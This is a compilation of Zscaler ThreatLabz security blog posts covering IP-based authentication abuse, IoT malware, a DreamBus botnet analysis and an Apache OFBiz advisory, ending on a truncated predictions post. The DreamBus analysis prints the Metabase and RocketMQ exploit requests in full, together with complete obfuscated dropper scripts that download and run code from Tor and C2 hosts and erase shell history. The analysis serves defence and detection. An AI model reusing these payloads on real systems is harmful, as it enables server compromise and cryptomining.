Fri, 19 Jan 2024 15:41:37 -0800Santiago Vicentehttps://www.zscaler.com/blogs/security-research/zloader-no-longer-silent-nightThreatLabz Security Advisory: Rise in Source IP-Based Authentication Abuse - Jan 19, 2024
https://www.zscaler.com/blogs/security-research/threatlabz-security-advisory-rise-source-ip-based-authentication-abuse-jan
Introduction
The Zscaler ThreatLabz team is seeing an increase in attacks that abuse IP-based authentication and target global organizations. Attackers are actively exploiting the limitations and weaknesses of IP-based authentication methods, posing a significant challenge for organizations. Successful attacks can lead to unauthorized system access, data breaches, and the potential compromise of critical assets.
In this advisory, we share information about risk exposure and best practices for organizations to defend against these attacks.
Key Takeaways
Zscaler ThreatLabz has observed an increase in source IP-based authentication abuse leveraging system compromise, identity compromise, and shadow IT environments, to name a few examples.
Employing a Zero Trust architecture, along with other security best practices, in managing your identities and multi-factor authentication (MFA) configuration is paramount to establishing a robust security posture and effectively mitigating the risks associated with unauthorized access and data breaches.
Further mitigate IP-based authentication vulnerabilities by implementing an identity provider (IdP) with FIDO2-based MFA and reinforcing user account reset processes.
Background
Organizations employ various methods to restrict access to sensitive data and systems. Source IP-based authentication is a commonly used method that provides a straightforward and quick way to control access. However, if IP-based authentication is one of the primary authentication mechanisms, it also introduces additional risk factors. IP-based authentication can:
Be difficult to scale as the organization grows in size and complexity.
Prevent the implementation of granular access controls.
Reduce the sophistication and level of effort that threat actors must leverage to access organizational assets.
Introduce challenges in auditing access and activity.
Examples Of IP-Based Authentication Abuse
Threat actors use many methods to bypass source IP-based authentication. The following examples describe recently observed common attack vectors:
System compromise: Compromising local system credentials or installing malware gives an attacker access to a system that can be allowlisted to multiple sensitive systems.
Wi-Fi networks: By relying on source IP-based authentication, organizations are at a higher risk of unauthorized access due to vulnerabilities or misconfigurations in wireless networks.
Identity compromise: Identity compromise can occur when threat actors use social engineering to manipulate help desk personnel, posing as legitimate users. Through this deception, they aim to gain initial access. Once inside, a threat actor can exploit the limitations of IP-based authentication, allowing them to move laterally within the system.
Physical access: When a threat actor gains physical access to an office or data center, they are free to access sensitive systems because they now have an authorized IP address.
Misconfiguration: Source IP-based authentication relies on accurate network definitions, and it is easy to introduce risk by exposing sensitive systems to uncontrolled IP spaces.
Shadow IT: Unmanaged shadow IT environments are common and introduce additional risk because IP-based authentication might not discern between managed and unmanaged environments.
Best Practices To Safeguard Against These Attacks
Although source IP filtering can serve as an additional layer of security, it should NOT be relied upon for authentication. By implementing the following measures and best practices, organizations can safeguard their sensitive systems and data, as well as identify and bolster the efficacy of their environments.
1. Move all crown-jewel applications behind Zero Trust solutions
Move all crown-jewel applications behind Zero Trust solutions such as Zscaler Private Access™ (ZPA™), and prioritize user-app segmentation for sensitive applications to proactively defend against these attacks. Zero Trust solutions can help you:
Deploy role-based access controls, providing granular access based on the user’s role to prevent access to unnecessary systems and limit risk.
Enforce posture control to ensure that only approved systems with a full endpoint security stack can communicate with sensitive applications.
Establish strong Data Loss Prevention (DLP) policies to control access and prevent exfiltration of sensitive information.
The key principles of a Zero Trust architecture ensure that you never trust and always verify. Organizations that implement a Zero Trust solution like Zscaler are able to:
Minimize the attack surface by making internal apps invisible to the internet.
Prevent compromise by using cloud-native proxy architecture to inspect all traffic inline and at scale, enforcing consistent security policies.
Stop lateral movement by connecting authorized users to applications rather than connecting networks to applications, which reduces the attack surface through strong posture check and workload segmentation.
Stop data loss by inspecting all internet-bound traffic, including encrypted channels, to prevent data theft.
Identify threats by leveraging deception technologies to stop attacks before an attacker’s objectives are accomplished.
2. Use an IdP with FIDO2-based MFA
Using an IdP with FIDO2-based MFA for authentication offers numerous advantages over relying solely on local accounts. IdPs provide centralized control and management of your administrator identities, which streamlines the authentication process and ensures consistency across applications and services. It also:
Simplifies user access management, which saves time and reduces mistakes.
Enables the implementation of single sign-on (SSO), allowing users to authenticate once and access applications securely, thus enhancing the user experience and eliminating the risk of weak or reused passwords.
Offers additional security features such as MFA and adaptive authentication, which provide additional defenses against unauthorized access.
3. Strengthen processes around user account resets
Strengthen processes around user account resets by training help desk personnel to perform strong user identity validation. You can:
Leverage corporate directory contact information to perform callbacks that ensure user identities before resetting access.
Require managers to personally validate identities when standard validation techniques are not possible.
Conclusion
The Zscaler ThreatLabz and Product Security teams continuously monitor threat trends and share their findings with customers and the wider community. If you have any questions, please reach out using the official support channel.
Fri, 19 Jan 2024 08:00:01 -0800Dhaval Parekhhttps://www.zscaler.com/blogs/security-research/threatlabz-security-advisory-rise-source-ip-based-authentication-abuse-janSecuring Public Sector Against IoT Malware in 2024
https://www.zscaler.com/blogs/security-research/securing-public-sector-against-iot-malware-2024
The rapid proliferation of the Internet of Things (IoT) represents vast opportunities for the public sector. Connected devices and smart technology are pivotal to enhancing the efficiency and effectiveness of public sector organizations, from optimizing critical infrastructure management to transforming remote education and smart city initiatives.
However, as IoT innovation and adoption grows, so do the associated security risks. Security has often been an afterthought in the design of IoT devices, if a thought at all, and connected devices introduce new vulnerabilities and vectors for attack by the day, if not minute. Generative AI makes it even easier for threat actors to identify and exploit these vulnerabilities.
Today’s Internet of Things might as well be called the Internet of Threats. This became abundantly clear last year as malware attacks on IoT devices emerged as a fast-rising threat. In this blog post, we’ll explore the potential impact of IoT malware on the public sector — a story of innovation, risk, and the need for resilience. Learn how Zscaler addresses the unique challenges public sector organizations face in defending against IoT threats.
IoT malware makes presence known in 2023
Based on data from the world’s largest inline security cloud, the recently released ThreatLabz Enterprise IoT and OT Threat Report revealed a 400% year-over-year increase in IoT malware attacks across various industries.
The primary objective of IoT malware is to exploit the weaknesses and vulnerabilities inherent in IoT devices. These malware strains are designed to perform various malicious activities, such as gaining unauthorized access, stealing data, and establishing botnets to carry out large-scale attacks.
ThreatLabz researchers found that the notorious Mirai and Gafgyt malware families, known for turning devices into botnets, drove the majority of attacks (constituting 66% of blocked payloads). These families are a particularly formidable threat to the public sector — in the form of distributed denial-of-service (DDoS) attacks. For instance, threat actors can weaponize IoT botnets to execute DDoS attacks targeting essential services and government websites. The potential impact extends to national security, financial losses, reputational damage, and a heightened risk of data compromise.
Key considerations for the public sector
IoT malware is capable of causing considerable harm to government operations, critical infrastructure, and essential public services.
Here are a few more ThreatLabz research insights that public sector organizations should pay attention to — but download this version of the report for the complete findings and analysis.
Two-thirds (66.7%) of malware attacks blocked by Zscaler were aimed at routers. Vulnerabilities in router firmware, weak passwords, and unpatched software serve as easy entry points for attackers looking to compromise these devices. This finding is a pertinent reminder for the public sector to remain vigilant regarding security threats associated with routers and other ubiquitous IoT devices. In September 2023, Chinese state-sponsored hackers strategically implanted modifying software in routers to obscure their activity and move laterally within the target network. The group’s focus has historically included government agencies and defense sectors, amongst other industries, in both the U.S. and East Asia.
The education sector experienced a staggering 961% increase in IoT malware attacks. Educational institutions are often deemed "soft targets" for cyber threats due to the substantial amount of personal data in their networks and the widespread use of unsecured IoT devices. Smart classrooms, online learning platforms, and connected devices create an expansive attack surface. It's become imperative for educational institutions to prioritize cybersecurity measures.
ThreatLabz observed a year-over-year decline in IoT malware attacks aimed at government customers. Some financially motivated threat actors may have shifted their focus to lucrative targets that are less likely to provoke law enforcement action. However, motivations behind IoT malware attacks are diverse, and the government must remain vigilant as IoT adoption by agencies and contractors grows — and threat actors look for low-hanging fruit during this election year.
As we shift from understanding the risks to taking proactive measures, the public sector is poised to tackle the challenges of IoT malware head-on. The following strategies highlight the steps needed to fortify against the ever-growing threats in the evolving landscape of connected devices.
Extend zero trust to your IoT/OT
ThreatLabz research findings underscore the importance of the public sector prioritizing robust IoT/OT security measures to ensure the continuous operation of essential services and resilience against IoT malware.
Adding urgency to this imperative for U.S. federal agencies, the Office of Management and Budget (OMB) recently mandated agencies to inventory all IoT assets (and stated that “many IoT devices constitute operational technology ‘OT’”) by the end of 2024. This means that agencies must gain a clear understanding of the devices connected to their networks in order to assess security risks effectively. The directive aims to enhance the overall security posture of the U.S. government and build resilience in the face of evolving cyber threats. It’s a reassuring sign of acknowledgment of the serious risks associated with unknown, unsecured IoT/OT devices.
Extending zero trust security — where visibility is a foundational component — to IoT/OT devices is critical for minimizing risks across public sector operations, contractors, and suppliers. Zscaler ThreatLabz recommends that you:
Implement a zero trust security architecture: Eliminate implicit trust. Enforce segmentation with least-privileged access to ensure users and devices can access only what they need. Unsanctioned shadow IoT devices requiring internet access should undergo traffic inspection and, ideally, be blocked from corporate data via a proxy.
Maintain comprehensive visibility into IoT devices: Gain visibility into all IoT devices, including unmanaged devices, to understand your attack surface and interdependencies. Leverage a solution with AI/ML capabilities to automatically classify and identify device types based on activity and behavior, without the need to install or manage sensors.
Conclusion
This is just the start of understanding the delicate balance between innovation and security in IoT ecosystems. The global number of connected IoT devices is nearly 17 billion today and is expected to surpass 23 billion in the next three years. The threat landscape will only become more nuanced and complicated. Being informed and proactive is key to ensuring the security and continuity of essential public sector services.
Take the next step in securing your organization against IoT malware and gain actionable guidance to reduce risk and enable secure IoT and OT adoption. Download the ThreatLabz 2023 Enterprise IoT and OT Threat Report: Public Sector Insights for comprehensive insights, analysis, and best practices from Zscaler ThreatLabz. Empower your journey towards a safer, smarter, and more resilient public sector.
Thu, 11 Jan 2024 11:35:16 -0800Adam Fordhttps://www.zscaler.com/blogs/security-research/securing-public-sector-against-iot-malware-2024DreamBus Unleashes Metabase Mayhem With New Exploit Module
https://www.zscaler.com/blogs/security-research/dreambus-unleashes-metabase-mayhem-new-exploit-module
Introduction
Zscaler’s ThreatLabz research team has been tracking the Linux-based malware family known as DreamBus. Not much has changed in the last few years other than minor bug fixes, and slight modifications to evade detection from security software. However, in the last 6 months, the threat actor operating DreamBus has introduced two new modules to target vulnerabilities in Metabase and Apache RocketMQ. This is likely in response to a decrease in new infections stemming from exploits utilized by DreamBus, many of which are dated and have been in use for several years. DreamBus also continues to use techniques that exploit implicit trust and weak passwords including Secure Shell (SSH), IT administration tools, cloud-based applications, and databases. The primary monetization vector for DreamBus infections is still through mining Monero cryptocurrency.
Key Takeaways
DreamBus is a modular Linux-based botnet dating back to early 2019 with worm-like behavior that can spread across the internet as well as internal networks.
DreamBus uses a combination of implicit trust, application-specific exploits, and weak passwords to gain access to systems such as databases, cloud-based applications, and IT administration tools.
Infected systems are monetized by mining Monero cryptocurrency using XMRig.
In June 2023, the DreamBus malware author introduced new changes to the code to further evade detection.
The threat actor developed two new exploit modules that target vulnerabilities in Metabase (CVE-2023-38646) and Apache RocketMQ (CVE-2023-33246).
Technical Analysis
Zscaler ThreatLabz has previously analyzed DreamBus and its modules. Each DreamBus module is an Executable and Linkable Format (ELF) binary that is packed by UPX with a modified header and footer. This alteration is designed to prevent the UPX command-line tool from statically unpacking DreamBus binaries. The magic bytes UPX! (0x21585055) are typically replaced with values that change over time. In recent DreamBus samples, the UPX magic bytes have been replaced with the value .gnu (0x756e672e).
DreamBus modules all have a very similar structure. The main difference between each module is the exploit code. Each module scans for servers listening on specific ports, performs exploitation, and if successful, executes shell scripts that download the main DreamBus module, which in turn deploys XMRig to mine Monero cryptocurrency. Each exploit module creates a lock file named /tmp/.systemd.3 to ensure that only one instance is running at a time. Each exploit module scans internal RFC 1918 ranges 172.16.0.0/12, 192.168.0.0/16, and 10.0.0.0/8 as well as randomly scanning public IP ranges.
Over the last 6 months, ThreatLabz observed DreamBus deploy modules for the following applications:
Metabase (CVE-2023-38646)
RocketMQ (CVE-2023-33246)
HashiCorp Consul
Hadoop YARN
Redis
PostgreSQL
SSH
The most commonly deployed DreamBus modules target PostgreSQL. Links to the current password lists used by DreamBus to brute force Redis, PostgreSQL, and SSH credentials are provided in the Appendix.
In this blog, we analyze the two exploit modules for Metabase and RocketMQ that were added recently.
Metabase Exploit Module (CVE-2023-38646)
Metabase is a popular business intelligence tool used to analyze and visualize data. The open source versions of Metabase 0.46.6.1 and earlier, as well as Metabase Enterprise 1.46.6.1 and earlier, are vulnerable to CVE-2023-38646, which was first documented in July 2023. The vulnerability allows an attacker to execute arbitrary commands on the server. The DreamBus exploit targeting the vulnerability is likely based on an open source proof-of-concept.
The first step is to scan for Metabase servers listening on port 3000 by sending the following HTTP request:
GET /api/session/properties HTTP/1.1
Host: 127.0.0.1:3000
The DreamBus module checks the response for the string metabase.D to identify whether the server is running Metabase. This string is likely attempting to identify the metabase.DEVICE cookie value. If this string is found, DreamBus stages the exploit by writing the following content to the file /tmp/.json%s (where the format %s string is the IP address of the Metabase server).
{
"token": "setup-token",
"details": {
"is_on_demand": false,
"is_full_sync": false,
"is_sample": false,
"cache_ttl": null,
"refingerprint": false,
"auto_run_queries": true,
"schedules": {},
"details": {
"db":
"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;",
"advanced-options": false,
"ssl": true,
"init": "CREATE TRIGGER metabasex BEFORE SELECT ON
INFORMATION_SCHEMA.TABLES AS
$$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c
{echo,dmtIenJnCmV4ZWMgJj4vZGV2L251bGwKTEhqRmd4dG49Li8uJChkYXRlfG1kNXN1
bXxoZWFkIC1jMjApCnVQWEFpRGdwPShkb2gtY2guYmxhaGRucy5jb20gZG9oLWRlLmJsYW
hkbnMuY29tIGRvaC1qcC5ibGFoZG5zLmNvbSBkb2gtc2cuYmxhaGRucy5jb20gZG9oLmxp
IGRvaC5wdWIgZG9oLmRucy5zYiBkbnMudHduaWMudHcpCkFjQ1FZZ0N5PSIvdG1wL3N5c3
RlbWQtcHJpdmF0ZS1kZTIzODFjY2JhOGFh...}|{base64,-d}|bash')\n$$"
},
"name": "meta-base-sex",
"engine": "h2"
}
}
DreamBus then executes the following bash command to send another request to the Metabase server to extract the setup token:
setup_token=$(curl -4fs %s:%d/api/session/properties|grep -Eo
"([[:alnum:]]{8}-[[:alnum:]]{4}-[[:alnum:]]{4}-[[:alnum:]]{4}-[[:alnum
:]]{12})"|tail -n 1);
After the setup token is extracted, DreamBus uses sed to replace the variable setup-token with the actual value retrieved from the server in the staged exploit file.
sed -i \"s/setup-token/$setup_token/g\" /tmp/.json%s;
Finally, DreamBus sends the exploit to the server via curl and deletes the staged exploit file in /tmp as follows:
curl -X POST -4fs -H \"Content-Type: application/json\" -d
@/tmp/.json%s %s:%d/api/setup/validate &>/dev/null;rm -f /tmp/.json%s
If the exploit is successful, the following bash script will download and execute the DreamBus main module:
exec &>/dev/null
LHjFgxtn=./.$(date|md5sum|head -c20)
uPXAiDgp=(doh-ch.blahdns.com doh-de.blahdns.com doh-jp.blahdns.com
doh-sg.blahdns.com doh.li doh.pub doh.dns.sb dns.twnic.tw)
AcCQYgCy="/tmp/systemd-private-de2381ccba8aa44b77bda1c971a33b5e-system
d-logind.service-vkHzrg"
VdHfWQsU="curl -m60 -fsSLkA- --doh-url
https://${uPXAiDgp[$((RANDOM%${#uPXAiDgp[@]}))]}/dns-query"
JtkrXMaj="curl -m60 -fsSLkA-"
MTWuGlJu="relay.tor2socks.in"
PcSKnocJ="ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad"
PATH=/tmp:$AcCQYgCy:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin
:/usr/local/sbin:$PATH
jJcSNhfn() {
read proto server path <<<$(echo ${1//// })
DOC=/${path// //}
HOST=${server//:*}
PORT=${server//*:}
[[ x"${HOST}" == x"${PORT}" ]] && PORT=80
exec 3<>/dev/tcp/${HOST}/$PORT
echo -en "GET ${DOC} HTTP/1.0\r\nUser-Agent: -\r\nHost:
${HOST}\r\n\r\n" >&3
(while read line; do
[[ "$line" == $'\r' ]] && break
done && cat) <&3
exec 3>&-
}
wtJymANw() {
for i in $AcCQYgCy . /usr/bin /var/tmp /tmp ;do echo exit > $i/i
&& chmod +x $i/i && cd $i && ./i && rm -f i && break;done
}
OUneYJaz() {
beKjoWyW=/exec
yXCmWOnw=mb0_$(curl -4 ident.me||curl -4 ip.sb)_$(whoami)_$(uname
-n)_$(uname -r)_$(cat /etc/machine-id||(ip r||hostname -i||echo
no-id)|md5sum|awk NF=1)
$VdHfWQsU -x socks5h://$MTWuGlJu:9050 -e$yXCmWOnw
$PcSKnocJ.onion$beKjoWyW -o$LHjFgxtn || $VdHfWQsU -e$yXCmWOnw
$1$beKjoWyW -o$LHjFgxtn || $JtkrXMaj -x socks5h://$MTWuGlJu:9050
-e$yXCmWOnw $PcSKnocJ.onion$beKjoWyW -o$LHjFgxtn || $JtkrXMaj
-e$yXCmWOnw $1$beKjoWyW -o$LHjFgxtn
}
ZVdmcgjf() {
chmod +x $LHjFgxtn;$LHjFgxtn;rm -f $LHjFgxtn
}
RAKjFxFv() {
u=$PcSKnocJ.tor2web.re/load/
cd /tmp && curl -V || (jJcSNhfn http://$u/cu) | tar zxp
wtJymANw
OUneYJaz $PcSKnocJ.tor2web.re ||
OUneYJaz $PcSKnocJ.tor2web.in ||
OUneYJaz $PcSKnocJ.tor2web.it
ZVdmcgjf
}
ls /proc/$(head -1 /tmp/.systemd.1)/maps || RAKjFxFv
rm -f /home/user/.bash_history
Apache RocketMQ Exploit Module (CVE-2023-33246)
Apache RocketMQ is an open source distributed messaging and streaming platform that was originally created by Alibaba in 2012. In June 2023, a vulnerability cataloged as CVE-2023-33246 was discovered that enables an attacker to achieve remote command execution (RCE) on RocketMQ versions 5.1.0 and earlier. Shortly after, DreamBus added an exploit module to target this vulnerability.
The DreamBus RocketMQ exploit module scans for vulnerable servers on port 10911 by sending the following request to a target server:
00000000 00 00 00 c8 00 00 00 60 7b 22 63 6f 64 65 22 3a |.......`{"code":|
00000010 32 35 2c 22 66 6c 61 67 22 3a 30 2c 22 6c 61 6e |25,"flag":0,"lan|
00000020 67 75 61 67 65 22 3a 22 4a 41 56 41 22 2c 22 6f |guage":"JAVA","o|
00000030 70 61 71 75 65 22 3a 30 2c 22 73 65 72 69 61 6c |paque":0,"serial|
00000040 69 7a 65 54 79 70 65 43 75 72 72 65 6e 74 52 50 |izeTypeCurrentRP|
00000050 43 22 3a 22 4a 53 4f 4e 22 2c 22 76 65 72 73 69 |C":"JSON","versi|
00000060 6f 6e 22 3a 33 39 35 7d 66 69 6c 74 65 72 53 65 |on":395}filterSe|
00000070 72 76 65 72 4e 75 6d 73 3d 31 0a 72 6f 63 6b 65 |rverNums=1.rocke|
00000080 74 6d 71 48 6f 6d 65 3d 2d 63 20 24 40 7c 73 68 |tmqHome=-c $@|sh|
00000090 20 2e 20 65 63 68 6f 20 63 75 72 6c 20 2d 66 73 | . echo curl -fs|
000000a0 53 6b 4c 41 2d 20 39 32 2e 32 30 34 2e 32 34 33 |SkLA- 92.204.243|
000000b0 2e 31 35 35 3a 38 30 38 30 2f 72 6f 6b 65 74 20 |.155:8080/roket |
000000c0 2d 6f 20 72 65 6b 65 74 65 64 3b 0a |-o reketed;.|
The first 4 bytes of the packet is the full message size (big endian), followed by 4 bytes for the size of the command (also big endian) within the curly braces. The code value 25 is used to call an update configuration function that is invoked without properly validating whether the client has the necessary permissions. As a result, an unauthenticated attacker can update the broker configuration file and most importantly the rocketmqHome variable to execute arbitrary commands. In this instance, the DreamBus module is setting the rocketmqHome variable in the configuration to the value:
-c $@|sh . echo curl -fsSkLA- 92.204.243.155:8080/roket -o reketed;
If the RocketMQ server is vulnerable, this shell command will use curl to download a malicious bash script and write it to a file named reketed. Example content of this script is shown below:
z3glwn;rm -f reketed
exec &>/dev/null
BDrFYzWg=./.$(date|md5sum|head -c20)
qyynvpBQ=(doh-ch.blahdns.com doh-de.blahdns.com doh-jp.blahdns.com
doh-sg.blahdns.com doh.li doh.pub doh.dns.sb dns.twnic.tw)
sNHouYjx="/tmp/systemd-private-ae776206422e886961eefb358c4fefda-system
d-logind.service-z3glwn"
GRPoNTxD="curl -m60 -fsSLkA- --doh-url
https://${qyynvpBQ[$((RANDOM%${#qyynvpBQ[@]}))]}/dns-query"
ZwJtGQaC="curl -m60 -fsSLkA-"
HNPDsmwz="relay.tor2socks.in"
HyMbvhNq="ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad"
PATH=/tmp:$sNHouYjx:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin
:/usr/local/sbin:$PATH
eGiAsomX() {
read proto server path <<<$(echo ${1//// })
DOC=/${path// //}
HOST=${server//:*}
PORT=${server//*:}
[[ x"${HOST}" == x"${PORT}" ]] && PORT=80
exec 3<>/dev/tcp/${HOST}/$PORT
echo -en "GET ${DOC} HTTP/1.0\r\nUser-Agent: -\r\nHost:
${HOST}\r\n\r\n" >&3
(while read line; do
[[ "$line" == $'\r' ]] && break
done && cat) <&3
exec 3>&-
}
bCQYhArV() {
for i in $sNHouYjx . /usr/bin /var/tmp /tmp ;do echo exit > $i/i
&& chmod +x $i/i && cd $i && ./i && rm -f i && break;done
}
XNSBjYOO() {
HoVCQHFu=/exec
LouMQEck=rq1_$(curl -s4 ident.me||curl -4
ip.sb)_$(whoami)_$(uname -n)_$(uname -r)_$(cat /etc/machine-id||(ip
r||hostname -i||echo no-id)|md5sum|awk NF=1)
$GRPoNTxD -x socks5h://$HNPDsmwz:9050 -e$LouMQEck
$HyMbvhNq.onion$HoVCQHFu -o$BDrFYzWg || $GRPoNTxD -e$LouMQEck
$1$HoVCQHFu -o$BDrFYzWg || $ZwJtGQaC -x socks5h://$HNPDsmwz:9050
-e$LouMQEck $HyMbvhNq.onion$HoVCQHFu -o$BDrFYzWg || $ZwJtGQaC
-e$LouMQEck $1$HoVCQHFu -o$BDrFYzWg
}
MPQKanDg() {
chmod +x $BDrFYzWg;$BDrFYzWg;rm -f $BDrFYzWg
}
dtOFCAtT() {
u=$HyMbvhNq.tor2web.it/load/
cd /tmp && curl -V || (eGiAsomX http://$u/cu) | tar zxp
bCQYhArV
XNSBjYOO $HyMbvhNq.tor2web.it ||
XNSBjYOO $HyMbvhNq.tor2web.in ||
XNSBjYOO $HyMbvhNq.tor2web.re
MPQKanDg
}
ls /proc/$(head -1 /tmp/.systemd.1)/maps || dtOFCAtT
The DreamBus RocketMQ exploit module checks for the string opaque in the response to determine whether the exploit was successful. If the exploitation attempt was successful, the module then sends the following request to the RocketMQ server to execute the bash script:
00000000 00 00 00 a2 00 00 00 60 7b 22 63 6f 64 65 22 3a |.......`{"code":|
00000010 32 35 2c 22 66 6c 61 67 22 3a 30 2c 22 6c 61 6e |25,"flag":0,"lan|
00000020 67 75 61 67 65 22 3a 22 4a 41 56 41 22 2c 22 6f |guage":"JAVA","o|
00000030 70 61 71 75 65 22 3a 30 2c 22 73 65 72 69 61 6c |paque":0,"serial|
00000040 69 7a 65 54 79 70 65 43 75 72 72 65 6e 74 52 50 |izeTypeCurrentRP|
00000050 43 22 3a 22 4a 53 4f 4e 22 2c 22 76 65 72 73 69 |C":"JSON","versi|
00000060 6f 6e 22 3a 33 39 35 7d 66 69 6c 74 65 72 53 65 |on":395}filterSe|
00000070 72 76 65 72 4e 75 6d 73 3d 31 0a 72 6f 63 6b 65 |rverNums=1.rocke|
00000080 74 6d 71 48 6f 6d 65 3d 2d 63 20 24 40 7c 73 68 |tmqHome=-c $@|sh|
00000090 20 2e 20 65 63 68 6f 20 62 61 73 68 20 72 65 6b | . echo bash rek|
000000a0 65 74 65 64 3b 0a |eted;.|
The bash script will then download and execute the main DreamBus module.
Conclusion
DreamBus continues to pose a threat to organizations with brute force attacks against PostgreSQL, SSH, and Redis along with new exploits that target recent vulnerabilities in popular business applications. Zscaler ThreatLabz recommends that organizations properly secure all applications that are both publicly and privately accessible. Strong passwords and multi-factor authentication (MFA) should always be used to secure internet services, and SSH public key authentication can be further strengthened by requiring a password to decrypt the private key. Organizations should also deploy network and endpoint monitoring systems to identify potential compromises.
Zscaler Coverage
Zscaler’s multilayered cloud security platform detects indicators at various levels, as shown below:
ELF32.Coinminer.DreamBus
ELF32.Coinminer.XMRig
Linux.Worm.SSHSpreader
Indicators of Compromise (IOCs)
The following IOCs can be used to detect a DreamBus infection.
Samples
SHA256 Hash
Module Name
cd647d4497661bf0a7f9a11fd5ca84d52
f49d4cca74941a31cf631c8f6bc88d2
DreamBus PostgreSQL module
5d1721d4d362ddcdbd0762eccdb4e07b0
cc1c26c7d69da30e024e70c7063c519
DreamBus Redis module
9f49375ae05c16d80e02c21f178429602
f726ce87295b9dfd9458f37956392e3
DreamBus Metabase module
25d7b17521629f0861113b1e9f7653dc1
9c40b1d8f3de685ba29108a0d9fa7aa
DreamBus Hadoop Yarn module
34603862c5086a9063e42d79fb094e8d8
9e3aeef6f8eadf23c6925c6a4201a9c
DreamBus Hashicorp Consul module
b86fa919ab9ebaa3f8ead4f7ef6ee0bb9
4a3a1b7d9583e99598893f2738a1c71
DreamBus RocketMQ module
e52b70a76e382ffd2aff02d1d26269036
c589676ba1f2086051c11cb7997a5a5
DreamBus SSH module
5a55acdae38219411b2f3350db425d888
3d6238e465d07a71cadfe89877df6ac
DreamBus XMRig miner
Network indicators
Domain/IP Address
Description
ru6r4inkaf4thlgflg4iqs5mhqwqubols
5qagspvya4whp3dgbvmyhad[.]onion
DreamBus C2 domain
139.59.150[.]7
DreamBus C2 IP address
92.204.243[.]155
DreamBus C2 IP address
p2pool[.]it
DreamBus Monero mining pool
Host indicators
Filenames
Description
/tmp/.systemd.3
DreamBus module lock file
/tmp/.json[ipaddress]
DreamBus Metabase exploit staged payload file
Password lists
SSH
PostgreSQL and Redis (the same password list is currently used for both applications)
Thu, 11 Jan 2024 08:30:01 -0800Brett Stone-Grosshttps://www.zscaler.com/blogs/security-research/dreambus-unleashes-metabase-mayhem-new-exploit-moduleApache OFBiz Authentication Bypass Vulnerability (CVE-2023-51467)
https://www.zscaler.com/blogs/security-research/apache-ofbiz-authentication-bypass-vulnerability-cve-2023-51467
Introduction
On December 26, 2023, researchers at SonicWall announced the discovery of a zero-day security flaw in Apache OFBiz. Tracked as CVE-2023-51467, the vulnerability allows threat actors to bypass authentication and perform a Server-Side Request Forgery (SSRF). CVE-2023-51467 earned a critical CVSS score of 9.8. According to researchers at SonicWall, a patch released for another vulnerability, CVE-2023-49070, left the initial issue unresolved, making authentication bypass possible.
Recommendations
Zscaler ThreatLabz strongly advises users of Apache OFBiz software to promptly upgrade to version 18.12.11, as this version contains crucial fixes to mitigate the identified security vulnerability (CVE-2023-51467).
Affected Versions
The following versions of Apache OFBiz are affected by the disclosed vulnerabilities and should be updated immediately:
All versions 18.12.10 and below are impacted by CVE-2023-51467
All versions 18.12.9 and below are impacted by CVE-2023-49070
Background
Apache OFBiz is an open-source Enterprise Resource Planning (ERP) system that provides business solutions for various industries. This includes tools to manage operations like customer relationships, order processing, human resource functions, and warehouse management.
On December 4, 2023, Apache released a patch to fix CVE-2023-49070. For this fix, Apache removed the XMLRPC endpoint and the OFBiz XMLRPC library, which was not maintained regularly. However, this fix didn’t resolve the root cause of CVE-2023-49070.
While validating the fix for CVE-2023-49070, researchers from SonicWall bypassed authentication in the newly fixed version of Apache OFBiz, leading to CVE-2023-51467.
How It Works
A threat actor sends an HTTP request to exploit a flaw in the checkLogin function. When null or invalid username and password parameters are supplied and the requirePasswordChange parameter is set to Y in the URI, the checkLogin function fails to validate the credentials, leading to authentication bypass. This occurs because the program flow circumvents the conditional block meant to check the username and password fields. By manipulating login parameters, threat actors can achieve Remote Code Execution (RCE) on a target server.
Zscaler Best Practices
Safeguard crown jewel applications by limiting lateral movement using Zscaler Private Access™ with application security modules turned on.
Route all server traffic through Zscaler Private Access™ with the application security module enabled and Zscaler Internet Access™, which provides visibility to identify and stop malicious activity from compromised systems/servers.
Turn on Zscaler Advanced Threat Protection™ to block all known command-and-control domains — thereby adding another layer of protection if an attacker exploits this vulnerability to implant malware.
Extend command-and-control (C2) protection to all ports and protocols with Zscaler Cloud Firewall™ (Cloud IPS module), including emerging C2 destinations. Doing so provides additional protection if the attacker exploits this vulnerability to implant malware.
Use Zscaler Cloud Sandbox™ to prevent unknown malware delivered as part of a second-stage payload.
Inspect all TLS/SSL traffic and restrict traffic to critical infrastructure from an allowed list of known-good destinations.
Conclusion
Apache OFBiz systems should promptly be updated to version 18.12.11. Failing to do so leaves systems vulnerable to CVE-2023-51467, allowing threat actors to manipulate login parameters and execute arbitrary code on the target server.
Zscaler Coverage
The Zscaler ThreatLabz team has deployed the following.
Zscaler Advanced Threat Protection
APP.EXPLOIT.CVE-2023-49070
APP.EXPLOIT.CVE-2023-51467
Zscaler Private Access AppProtection
6000751 - Apache OFBiz XMLRPC Insecure Deserialization (CVE-2023-49070)
6000753 - Apache OFBiz Auth Bypass and Code Injection (CVE-2023-51467)
For more details, visit the Zscaler Threat Library.
References
https://blog.sonicwall.com/en-us/2023/12/sonicwall-discovers-critical-apache-ofbiz-zero-day-authbiz/
https://threatprotect.qualys.com/2023/12/27/apache-ofbiz-authentication-bypass-vulnerability-cve-2023-51467/
https://lists.apache.org/thread/9tmf9qyyhgh6m052rhz7lg9vxn390bdv
Mon, 08 Jan 2024 09:01:05 -0800Nishant Guptahttps://www.zscaler.com/blogs/security-research/apache-ofbiz-authentication-bypass-vulnerability-cve-2023-51467Top 5 Cyber Predictions for 2024: A CISO Perspective
https://www.zscaler.com/blogs/security-research/top-5-cyber-predictions-2024-ciso-perspective
Amidst the ever-evolving realm of enterprise security, a new year unfolds, introducing a dynamic array of emerging threats. While the “prediction season” gains momentum, it's pivotal to reflect on the high impact of the 2023 cybersecurity landscape. This past year set a profound stage, from the advent of stringent cyber regulations to the convergence of generative AI, social engineering, and ransomware.
Let's delve into the rewind of 2023, exploring five influential trends and threats that molded the cyberthreat landscape and are poised to resonate throughout enterprises in 2024.
2023 Rewind — Cyber Trends and Threats
The generative AI (r)evolution
